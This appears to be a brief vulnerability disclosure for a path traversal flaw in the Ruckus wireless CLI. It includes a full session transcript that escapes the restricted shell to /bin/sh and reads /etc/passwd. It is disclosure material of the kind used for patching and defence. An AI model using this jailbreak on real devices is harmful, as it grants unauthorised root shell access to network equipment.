This is a command injection vulnerability via a crafted CLI command.
/bin/ruckus_cli2 is a CLI used by Ruckus for user interaction and run commands by their web interface.
ruckus_cli2 has a
script menu that can run limited set of stored scripts.
exec command in that menu is vunrable to path traversal, and can be used to run
/bin/sh in order to escape to a busybox shell.
Jail breaking Ruckus CLI using this exploit
Please login: admin Password: Welcome to Ruckus Unleashed Network Command Line Interface ruckus> enable ruckus# debug You have all rights in this mode. ruckus(debug)# script ruckus(script)# exec ../../../bin/sh Ruckus Wireless ZoneDirector -- Command Line Interface Enter 'help' for a list of built-in commands. ruckus$ echo $USER admin ruckus$ grep $USER /etc/passwd admin:$1$-----------:0:0:root:/:/bin/sh